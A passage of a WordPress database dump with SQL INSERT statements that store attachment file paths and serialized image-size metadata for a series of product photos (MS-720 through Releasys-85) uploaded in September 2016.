INSERT INTO `wp_postmeta` VALUES (17606, 1766, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-720.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-720-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-720-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-720-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-720-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-720-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-720-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-720-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-720-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17607, 1767, '_wp_attached_file', '2016/09/MS-725.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17608, 1767, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-725.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-725-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-725-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-725-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-725-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-725-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-725-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-725-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-725-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17609, 1768, '_wp_attached_file', '2016/09/MS-730.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17610, 1768, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-730.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-730-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-730-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-730-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-730-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-730-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-730-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-730-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-730-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17611, 1769, '_wp_attached_file', '2016/09/MS-745.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17612, 1769, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-745.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-745-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-745-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-745-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-745-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-745-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-745-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-745-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-745-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17613, 1770, '_wp_attached_file', '2016/09/MS-750.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17614, 1770, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-750.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-750-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-750-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-750-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-750-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-750-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-750-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-750-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-750-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17615, 1771, '_wp_attached_file', '2016/09/MS-755.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17616, 1771, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-755.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-755-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-755-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-755-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-755-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-755-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-755-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-755-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-755-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"5";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17617, 1772, '_wp_attached_file', '2016/09/MS-760.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17618, 1772, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-760.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-760-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-760-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-760-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-760-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-760-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-760-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-760-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-760-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17619, 1773, '_wp_attached_file', '2016/09/MS-765.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17620, 1773, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-765.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-765-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-765-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-765-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-765-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-765-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-765-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-765-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-765-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17621, 1774, '_wp_attached_file', '2016/09/MS-770.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17622, 1774, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-770.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-770-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-770-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-770-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-770-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-770-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-770-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-770-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-770-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17623, 1775, '_wp_attached_file', '2016/09/MS-780.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17624, 1775, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-780.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-780-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-780-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-780-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-780-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-780-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-780-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-780-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-780-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17625, 1776, '_wp_attached_file', '2016/09/MS-785.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17626, 1776, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-785.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-785-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-785-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-785-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-785-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-785-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-785-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-785-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-785-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"3";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17627, 1777, '_wp_attached_file', '2016/09/MS-795.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17628, 1777, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:18:"2016/09/MS-795.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:18:"MS-795-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:18:"MS-795-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:18:"MS-795-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:20:"MS-795-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:18:"MS-795-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:18:"MS-795-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:18:"MS-795-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:18:"MS-795-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"6";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17629, 1778, '_wp_attached_file', '2016/09/releasys-82-2.jpg'); 
INSERT INTO `wp_postmeta` VALUES (17630, 1778, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:25:"2016/09/releasys-82-2.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:25:"releasys-82-2-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:25:"releasys-82-2-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:25:"releasys-82-2-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:27:"releasys-82-2-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:25:"releasys-82-2-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:25:"releasys-82-2-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:25:"releasys-82-2-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:25:"releasys-82-2-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:89;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (17631, 1779, '_wp_attached_file', '2016/09/Releasys-85.jpg'); 
